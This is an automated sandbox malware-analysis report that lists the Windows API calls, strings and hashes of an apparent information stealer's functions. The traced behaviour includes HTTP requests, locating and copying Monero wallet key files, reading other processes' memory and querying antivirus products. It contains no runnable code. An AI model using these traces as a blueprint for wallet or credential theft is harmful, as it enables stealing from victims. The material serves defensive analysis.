                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1973479514-0
                                                                                                                                                                                                                                                                            • Opcode ID: 74e1f64ca746990e000dc16853746c1c8c4e6ee652172f2314a50c48505eac86
                                                                                                                                                                                                                                                                            • Instruction ID: f39e1bd7dab92496fbde9404480356453d89dcc36ccb70b28e1b0f1b61e95687
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 74e1f64ca746990e000dc16853746c1c8c4e6ee652172f2314a50c48505eac86
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BB025C71900148EADB14EBE4DD55BEEBB79AF19304F10817EF502B3292DB786A08CB75
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 00405A80 Relevance: 30.0, APIs: 12, Strings: 5, Instructions: 200networkfileCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                              • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 00404482
                                                                                                                                                                                                                                                                              • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 0040448F
                                                                                                                                                                                                                                                                              • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 0040449C
                                                                                                                                                                                                                                                                              • Part of subcall function 00404430: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044B6
                                                                                                                                                                                                                                                                              • Part of subcall function 00404430: InternetCrackUrlA.WININET(00000000,00000000), ref: 004044C6
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405AF8
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00E39A60,?,?,?,?,?,?,00000004), ref: 00405B10
                                                                                                                                                                                                                                                                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405B34
                                                                                                                                                                                                                                                                            • HttpOpenRequestA.WININET(00000000,GET,?,00E39E50,00000000,00000000,-00400100,00000000), ref: 00405B6B
                                                                                                                                                                                                                                                                            • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405B8F
                                                                                                                                                                                                                                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00405B9A
                                                                                                                                                                                                                                                                            • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00405BB8
                                                                                                                                                                                                                                                                            • InternetReadFile.WININET(00000000,?,000007CF,00420039), ref: 00405C05
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,00E2E4B0,?), ref: 0041001C
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                            • InternetReadFile.WININET(00000000,?,000007CF,00420039), ref: 00405C5B
                                                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00405C66
                                                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 00405C70
                                                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00405C7A
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequestlstrlen$ConnectCrackInfoOptionQuerySendlstrcat
                                                                                                                                                                                                                                                                            • String ID: ERROR$ERROR$GET$;A$;A
                                                                                                                                                                                                                                                                            • API String ID: 1851261701-2536196751
                                                                                                                                                                                                                                                                            • Opcode ID: 9429579aba8b7dc35131f515e91d8e296aee0c1f4835abc00abfe40e63ec2ece
                                                                                                                                                                                                                                                                            • Instruction ID: f51bac302368146bc70526799d3d27fc4bd2090a82c05307e47728f2a195adfa
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9429579aba8b7dc35131f515e91d8e296aee0c1f4835abc00abfe40e63ec2ece
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EC618071900218AFEB10DBA4CC85FEFB77DEB45744F40412AFA01B3281DB786E448BA5
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 00401D40 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 199registrymemorystringCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00401D74
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00401D8A
                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00401D91
                                                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,004021A1), ref: 00401DAE
                                                                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(004021A1,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401DC8
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                              • Part of subcall function 004153E0: Sleep.KERNEL32(000003E8,00422591,PdA,?,?,?,00000001), ref: 004154A5
                                                                                                                                                                                                                                                                              • Part of subcall function 004153E0: CreateThread.KERNEL32(00000000,00000000,00413E10,?,00000000,00000000), ref: 004154C6
                                                                                                                                                                                                                                                                              • Part of subcall function 004153E0: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004154D2
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(004021A1), ref: 00401DD2
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(?,00000000), ref: 00401DE0
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(?), ref: 00401DED
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(?,.keys), ref: 00401E08
                                                                                                                                                                                                                                                                            • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401EF5
                                                                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(00000000), ref: 00401F6F
                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00401F8D
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FileHeaplstrcatmemset$AllocCloseCopyCreateDeleteObjectOpenProcessQuerySingleSleepThreadValueWaitlstrcpylstrlen
                                                                                                                                                                                                                                                                            • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                                                                                                                                                                                                                                                            • API String ID: 862308015-218353709
                                                                                                                                                                                                                                                                            • Opcode ID: 5bda73edc0443aef9e82f0dd98887af7bd8fa38de16dcd6028e2dc442075adf6
                                                                                                                                                                                                                                                                            • Instruction ID: 4c9a7f9921557c481f332da0f174eeeaaaca44ebdec2039f9a6925745ca66f22
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5bda73edc0443aef9e82f0dd98887af7bd8fa38de16dcd6028e2dc442075adf6
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7A719F71900258AACB14EBE4DC46BEDBB79AF19304F54416EF605B31D2EB782708CBB5
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 00412350 Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 323stringCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • strtok_s.MSVCRT ref: 00412396
                                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 00412423
                                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 00412460
                                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 004124A9
                                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 004124F2
                                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 0041253A
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,true,?), ref: 004126C5
                                                                                                                                                                                                                                                                            • strtok_s.MSVCRT ref: 00412752
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrcpy$strtok_s
                                                                                                                                                                                                                                                                            • String ID: false$true
                                                                                                                                                                                                                                                                            • API String ID: 2610293679-2658103896
                                                                                                                                                                                                                                                                            • Opcode ID: ce137c0223425141530cf3f77ebad13e5dede02dc8e5628b2fc49f88788a9856
                                                                                                                                                                                                                                                                            • Instruction ID: 9783b729b2b96f1e089f7dd286e8eef65b2713682f5ee12b46c125a55e388804
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ce137c0223425141530cf3f77ebad13e5dede02dc8e5628b2fc49f88788a9856
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EEC10A75800109EFDB14EBA4DD85EDEB779AF05304F00816EF616A3292DA385789CBA5
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 00410800 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 210registrystringCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(00000000,00E367A0,00000000,00020019,00000000,004270A7,?,00000001), ref: 0041085F
                                                                                                                                                                                                                                                                            • RegEnumKeyExA.KERNEL32(00000000,?,?,0042750C,00000000,00000000,00000000,00000000,?,?,00000001), ref: 004108BE
                                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 004108E7
                                                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,?), ref: 00410905
                                                                                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(?,00E39DF0,00000000,000F003F,?,00000400), ref: 00410935
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(?), ref: 0041094A
                                                                                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(?,00E39D30,00000000,000F003F,?,00000400,00000000,004219B1,?,00000000,?,004270D8), ref: 004109CE
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: OpenQueryValuelstrcpy$Enumlstrlenwsprintf
                                                                                                                                                                                                                                                                            • String ID: - $%s\%s$?
                                                                                                                                                                                                                                                                            • API String ID: 1989970852-3278919252
                                                                                                                                                                                                                                                                            • Opcode ID: ab5f312c3f732c128b1771b3ab0d6ee776d6e09258c729d89f25b68380dbf8b9
                                                                                                                                                                                                                                                                            • Instruction ID: f9f4651bf3973da61bec05af46e24bbf11bae8a96c478798f350ddba051ec134
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ab5f312c3f732c128b1771b3ab0d6ee776d6e09258c729d89f25b68380dbf8b9
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B7816B7190422DABCB14DB94DC84EEEB7B9FF59704F10416EF605B3281DB786A08CBA4
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 00404C00 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 194networkmemoryfileCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                              • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 00404482
                                                                                                                                                                                                                                                                              • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 0040448F
                                                                                                                                                                                                                                                                              • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 0040449C
                                                                                                                                                                                                                                                                              • Part of subcall function 00404430: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044B6
                                                                                                                                                                                                                                                                              • Part of subcall function 00404430: InternetCrackUrlA.WININET(00000000,00000000), ref: 004044C6
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF,?,?,?,?,?,?,00000000), ref: 00404C5B
                                                                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,?,?,?,?,?,00000000), ref: 00404C62
                                                                                                                                                                                                                                                                            • InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404C80
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00E39A60,?,?,?,?,?,?,00000000), ref: 00404C96
                                                                                                                                                                                                                                                                            • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404CC1
                                                                                                                                                                                                                                                                            • HttpOpenRequestA.WININET(00000000,GET,?,00E39E50,00000000,00000000,-00400100,00000000), ref: 00404CFB
                                                                                                                                                                                                                                                                            • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404D20
                                                                                                                                                                                                                                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404D32
                                                                                                                                                                                                                                                                            • HttpQueryInfoA.WININET(000000FF,00000013,?,?,00000000), ref: 00404D54
                                                                                                                                                                                                                                                                            • InternetReadFile.WININET(000000FF,?,00000400,00000001), ref: 00404DC4
                                                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00404DF5
                                                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00404DFF
                                                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 00404E09
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Internet$CloseHandleHttp$HeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
                                                                                                                                                                                                                                                                            • String ID: GET
                                                                                                                                                                                                                                                                            • API String ID: 442264750-1805413626
                                                                                                                                                                                                                                                                            • Opcode ID: c8598b76782b08933c13cff9c97261692f6bb3eeeac1fb73a4ca9257dacd5c94
                                                                                                                                                                                                                                                                            • Instruction ID: d281c038e4fc1d43085ff1e335aac5a1d2015f5d0f0e8fc3e36784ae5f7bfe4e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c8598b76782b08933c13cff9c97261692f6bb3eeeac1fb73a4ca9257dacd5c94
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EF6164B5A00219ABEB20DBA4DC45FEFB7B9EB49710F104129FA15F72C0D7789904CBA5
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 0040FB20 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 200stringCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ??_U@YAPAXI@Z.MSVCRT ref: 0040FB4B
                                                                                                                                                                                                                                                                            • OpenProcess.KERNEL32(001FFFFF,00000000,00000000,00000000), ref: 0040FB73
                                                                                                                                                                                                                                                                            • strlen.MSVCRT ref: 0040FB94
                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0040FBD0
                                                                                                                                                                                                                                                                            • ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00000208,00000000), ref: 0040FC2B
                                                                                                                                                                                                                                                                            • strlen.MSVCRT ref: 0040FC38
                                                                                                                                                                                                                                                                            • strlen.MSVCRT ref: 0040FC7E
                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0040FCCA
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0040FBE6, 0040FCE3
                                                                                                                                                                                                                                                                            • N0ZWFt, xrefs: 0040FC79, 0040FC89
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: strlen$Processmemset$MemoryOpenRead
                                                                                                                                                                                                                                                                            • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30$N0ZWFt
                                                                                                                                                                                                                                                                            • API String ID: 47329967-1622206642
                                                                                                                                                                                                                                                                            • Opcode ID: 8515397436616f86fadcf9a59e55485939000e9b722e0d944461951cf1175df8
                                                                                                                                                                                                                                                                            • Instruction ID: 20f69977443de8948ddffc0f4a3381c49359371f896369b3d50972fa4481eb24
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8515397436616f86fadcf9a59e55485939000e9b722e0d944461951cf1175df8
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 80612571D00208ABEB309B91DC45BEFB678AF84714F14413EF915B76C1D7BC598887A9
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 004111E0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 136comCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CoInitializeEx.OLE32(00000000,00000000,?,00000000,?,AV: ,00000000,?,00427418,00000000,?,00000000,00000000), ref: 00411203
                                                                                                                                                                                                                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,?,AV: ,00000000,?,00427418), ref: 00411214
                                                                                                                                                                                                                                                                            • CoCreateInstance.OLE32(00427D04,00000000,00000001,00427C34,?,?,00000000,?,AV: ,00000000,?,00427418,00000000,?,00000000,00000000), ref: 0041122E
                                                                                                                                                                                                                                                                            • CoSetProxyBlanket.OLE32(00427418,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,?,AV: ,00000000,?,00427418,00000000), ref: 00411267
                                                                                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 004112C2
                                                                                                                                                                                                                                                                              • Part of subcall function 004115F0: LocalAlloc.KERNEL32(00000040,00000005,00000000,?,004112EB,?,?,00000000,?,AV: ,00000000,?,00427418,00000000,?,00000000), ref: 004115F8
                                                                                                                                                                                                                                                                              • Part of subcall function 004115F0: CharToOemW.USER32(?,00000000), ref: 00411605
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 004112FD
                                                                                                                                                                                                                                                                            Strings
